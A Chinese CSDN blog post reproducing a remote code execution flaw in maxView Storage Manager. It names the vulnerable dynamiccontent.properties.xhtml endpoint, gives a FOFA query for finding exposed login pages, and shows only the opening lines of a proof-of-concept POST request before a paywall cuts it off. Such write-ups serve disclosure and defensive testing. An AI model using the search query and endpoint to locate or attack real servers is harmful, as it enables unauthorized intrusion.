【漏洞复现】maxView Storage Manager 远程代码执行漏洞

于 2024-08-09 19:41:37 发布
阅读量828 收藏 6
点赞数 10
文章标签: 安全 web安全 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/141069853
版权

        maxView Storage Manager使查看、监控和配置系统中基于Microsemi RAID适配器构建的所有存储变得简单。⽅便的图形⽤户界⾯(GUI)在Microsemi产品线和⽀持的操作系统(包括
Windows、Linux、VMWare和Solaris)中的外观和操作都相同。使⽤此单⼀⼯具集中管理直连存储(DAS)和⽹络存储。此外,还可通过maxCache SSD Caching管理现有卷的⾼级缓存池,并通过Adaptec Intelligent Power Management管理存储功耗。


》》》漏洞描述《《《

        maxView Storage Manager系统dynamiccontent.properties.xhtm)存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执
行任意代码获取服务器权限。

》》》影响范围《《《

maxView Storage Manager系统

》》》环境搭建《《《

fofa:"maxView Storage Manager - Login"

》》》漏洞复现《《《

poc数据包

POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 
User-Agent: User-Agent:
最低0.47元/天 解锁文章
A 八方
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值